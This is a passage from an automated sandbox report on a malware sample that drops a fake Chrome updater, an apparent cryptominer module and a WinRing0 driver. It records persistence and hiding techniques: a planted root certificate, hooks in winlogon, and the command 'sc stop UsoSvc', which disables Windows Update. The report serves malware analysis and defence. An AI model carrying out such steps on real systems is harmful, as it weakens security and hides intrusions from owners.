                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: hiwA7Blv7C.exeStatic PE information: Image base 0x140000000 > 0x60000000
                    Source: hiwA7Blv7C.exeStatic file information: File size 5925152 > 1048576
                    Source: hiwA7Blv7C.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x59b200
                    Source: hiwA7Blv7C.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                    Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: dialer.exe, 0000002F.00000002.3318123219.00000246FAE30000.00000004.00000001.00020000.00000000.sdmp
                    Source: updater.exe.0.drStatic PE information: real checksum: 0x5aec8c should be: 0x5aff8f
                    Source: bzqlyietdwsj.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0x316d6
                    Source: hiwA7Blv7C.exeStatic PE information: real checksum: 0x5aec8c should be: 0x5aff8f
                    Source: bzqlyietdwsj.tmp.26.drStatic PE information: real checksum: 0x0 should be: 0x564f65
                    Source: hiwA7Blv7C.exeStatic PE information: section name: .xdata
                    Source: updater.exe.0.drStatic PE information: section name: .xdata
                    Source: bzqlyietdwsj.tmp.26.drStatic PE information: section name: _RANDOMX
                    Source: bzqlyietdwsj.tmp.26.drStatic PE information: section name: _TEXT_CN
                    Source: bzqlyietdwsj.tmp.26.drStatic PE information: section name: _TEXT_CN
                    Source: bzqlyietdwsj.tmp.26.drStatic PE information: section name: _RDATA
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D01659ACDD push rcx; retf 003Fh23_2_000002D01659ACDE
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D0165FC6DD push rcx; retf 003Fh23_2_000002D0165FC6DE
                    Source: C:\Windows\System32\winlogon.exeCode function: 23_2_000002D01662ACDD push rcx; retf 003Fh23_2_000002D01662ACDE
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F14FACDD push rcx; retf 003Fh27_2_000002D6F14FACDE
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F152C6DD push rcx; retf 003Fh27_2_000002D6F152C6DE
                    Source: C:\Windows\System32\lsass.exeCode function: 27_2_000002D6F158C6DD push rcx; retf 003Fh27_2_000002D6F158C6DE
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FBACDD push rcx; retf 003Fh30_2_0000014E41FBACDE
                    Source: C:\Windows\System32\svchost.exeCode function: 30_2_0000014E41FEC6DD push rcx; retf 003Fh30_2_0000014E41FEC6DE
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B06ACDD push rcx; retf 003Fh31_2_000001D15B06ACDE
                    Source: C:\Windows\System32\dwm.exeCode function: 31_2_000001D15B09C6DD push rcx; retf 003Fh31_2_000001D15B09C6DE
                    Source: C:\Windows\System32\svchost.exeCode function: 46_2_0000023AF32CACDD push rcx; retf 003Fh46_2_0000023AF32CACDE
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FD7ACDD push rcx; retf 003Fh50_2_0000023C9FD7ACDE
                    Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000023C9FDAC6DD push rcx; retf 003Fh50_2_0000023C9FDAC6DE
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA6FACDD push rcx; retf 003Fh51_2_000001A1CA6FACDE
                    Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001A1CA72C6DD push rcx; retf 003Fh51_2_000001A1CA72C6DE
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246ED7CACDD push rcx; retf 003Fh53_2_00000246ED7CACDE
                    Source: C:\Windows\System32\svchost.exeCode function: 53_2_00000246EDE7C6DD push rcx; retf 003Fh53_2_00000246EDE7C6DE
                    Source: C:\Windows\System32\svchost.exeCode function: 54_2_00000200A19CC6DD push rcx; retf 003Fh54_2_00000200A19CC6DE
                    Source: C:\Windows\System32\svchost.exeCode function: 55_2_000002259669C6DD push rcx; retf 003Fh55_2_000002259669C6DE

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\libtqlibdoyd.sysJump to behavior
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                    Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\bzqlyietdwsj.tmpJump to dropped file
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeFile created: C:\Users\user\AppData\Local\Temp\bzqlyietdwsj.tmpJump to dropped file
                    Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\libtqlibdoyd.sysJump to dropped file
                    Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\bzqlyietdwsj.tmpJump to dropped file
                    Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\libtqlibdoyd.sysJump to dropped file
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Users\user\Desktop\hiwA7Blv7C.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BZQLYIETDWSJ.TMP
                    Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\BZQLYIETDWSJ.TMP
                    Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\BZQLYIETDWSJ.TMP
                    Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\BZQLYIETDWSJ.TMP
                    Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
                    Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
                    Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                    Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
